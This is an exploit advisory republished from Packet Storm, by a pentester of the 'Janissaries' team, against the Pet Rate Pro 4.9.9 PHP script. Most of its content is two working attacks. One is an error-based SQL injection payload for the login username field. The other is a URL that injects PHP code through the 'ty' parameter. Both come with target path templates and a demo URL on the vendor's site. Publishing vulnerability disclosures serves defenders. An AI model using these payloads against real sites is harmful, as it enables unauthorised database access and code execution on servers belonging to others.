Scripts Genie Pet Rate Pro version 4.9.9 suffers from remote SQL injection and code injection vulnerabilities.
e55d6373fb5294f8a0c6fc9a3e933425b551b3bb554e7d3fea8131af660bef2d#########################################################################
# __ .__ .__ #
# |__|____ ____ |__| ______ ___________ _______|__| ____ ______ #
# | \__ \ / \| |/ ___// ___/\__ \\_ __ \ |/ __ \ / ___/ #
# | |/ __ \| | \ |\___ \ \___ \ / __ \| | \/ \ ___/ \___ \ #
#/\__| (____ /___| /__/____ >____ >(____ /__| |__|\___ >____ > #
#\______| \/ \/ \/ \/ \/ \/ \/ #
# www.janissaries.org #
##=====================================================================##
# Author(Pentester): TheMirkin
# Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
#------------------------------------------------------------------------
# Exploit Title: Pet Rate Pro Multi Vulnerability
# Google Dork:
# Date:
# scripts Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro
# Version: 4.9.9
#
# Tested on: Win7,BackTrack5
#
##=======================================================================
#=> Exploit: SQL injection
http://[target]/[path]//demo/PetRatePro/index.php?cmd=4
Demo:
URL encoded POST input username was set to
'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
#=> Exploit: Code Ýnjection
http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d"
Demo:
http://scriptsgenie.com/demo/PetRatePro/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22
##=======================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed